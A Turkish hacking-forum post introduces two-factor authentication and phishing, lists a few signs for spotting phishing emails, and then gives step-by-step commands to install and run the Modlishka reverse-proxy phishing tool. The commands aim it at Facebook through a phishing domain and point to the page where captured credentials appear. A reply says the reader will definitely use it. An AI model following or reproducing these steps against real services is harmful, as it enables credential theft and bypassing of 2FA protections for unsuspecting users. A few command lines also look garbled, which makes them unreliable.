Modlishka - 2FA Kimlik Avı

17 Nis 2021
72
27
Bu yazımda 2FA, Kimlik Avı ve Modlishka (2FA Kimlik Avı) bahsedeceğim.

Yazımıza 2FA Nedir İle Başlayalım;
2FA (İki Faktörlü Kimlik Doğrulaması)
2FA genelde web sitelerinde ikinci hesap koruma yöntemi olarak bilinir. Yani herhangi bir kullanıcı, Adını ve Şifresini yazdığında SMS doğrulamasına atarak kimlik güvenliği için kod ister. Bu koduda yalnızca kullanıcı görebilir.

2FA Neden Kullanmalıyız?
Günümüzde yeni yeni kullanılmaya başlanan ve yaygın hale getirilen bu güvenlik katmanı hesap güvenliği, kişisel bilgiler, banka bilgileri korunmasında yardımcı olabilecek güçlü bir güvenlik katmanıdır. Bir saldırgan, Adını ve Şifresini girdiğinde ilerlese bile SMS doğrulamasında takılır ancak bazı saldırganlar “Phishing” yani sosyal mühendislik yöntemiyle bunu da kolaylıkla atlatır.

mkjo8.jpg


Kimlik Avı kısaca Sanal Dolandırıcılık;
Bir saldırgan, E-Posta yöntemi ve sahte domainler ile kolayca bir senaryo hazırlayıp kullanıcıdan bilgileri alabilir. Günümüzde kullanılan en yaygın olan Phishing, saldırgan için oldukça basittir. Bir E-Posta gönderip, tıklamasını sağlatarak bir çok bilgiye kolayca ulaşır.

Kimlik Avı Anlama Yöntemleri
*E-Postalar kurumsal değil, bireyseldir.
[email protected]
[email protected]
*Web sitesi barındırıyorsa gerçek değil, benzeridir.
-gmail.com
-gmaail.com
*Mesajlarda maddi istekler bulunabilir. Unutmayın, hiçbir şirket sizden maddiyat talep etmez.
*Mesajda noktalama hataları, yazım yanlışları veya anlam bozuklukları olabilir.

Posta değilde Web Sitesi İse;
*HTTP yerine HTTPS olmasına dikkat edin.
*Güvenmediğiniz sitelere bilgilerinizi kesinlikle girmeyin.

mkwh2.jpg


Şimdi ise gelelim Kimlik Avı yöntemimize
Gerekenler;
*Kali Linux
*Modlishka


Şimdi gelelim Modlishka kurulumuna;

Linux Termalimizi açıp şu kodu girelim
Kod:
-go get -u github.com/drk1wi/Modlishka



Şimdi “Go” klasörümüze gidip yeni kodumuzu yazıyoruz ve çalıştırıyoruz
Kod:
-cd $GOPATH/go/src/github.com/drk1wi/Modlishka/ Attribution
Ve
Kod:
-Make

Modlishka’yı Çalıştıralım;

“Dist” klasörüne gidip proxyi çalıştıralım.
Kod:
-cd dist/
./proxy -h

mkH8k.jpg

Devamında;

1.Karşınıza birçok farklı seçecek çıkacaktır. Şimdi bu phishingi güvenilir hale getirmek için “openssl” kullanarak kendi sertifikamızı oluşturalım.
2.Proxy’i görmek için aşağıda vereceğim kodu çalıştırmanız yeterli olacaktır.
3.Kodumuzda PhishingDomain kullanacağız ancak ihtiyaçlara göre değiştirebilirsiniz.
4.OpenSSL kullandığımız için “ 'loopback.modlishka.io’ ” bu adresi kullanacağız.
5. Tabi bu adresi kullanmak istiyorsanız dosyanızın “index.html” kısmını (/var/www) olarak değiştirmelisiniz.

Kod:
./proxy -target https://facebook.com -phishingDomain loopback.modlishka.io -listeningPort 80
mkdxF.png

Artık sahip olduğunuz tüm kimlik avı bilgilerinizi
Kod:
http://loopback.modlishka.io/SayHello2Modlishka/
kısmından görebilirsiniz.​
 

Loux

Uzman üye
16 Ocak 2019
1,753
1,085
BL4CKGORE
Efsane konu ellerinize emeğinize sağlık,kaydedilenler'e ekledim.Kesinlikle kullanacağım
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.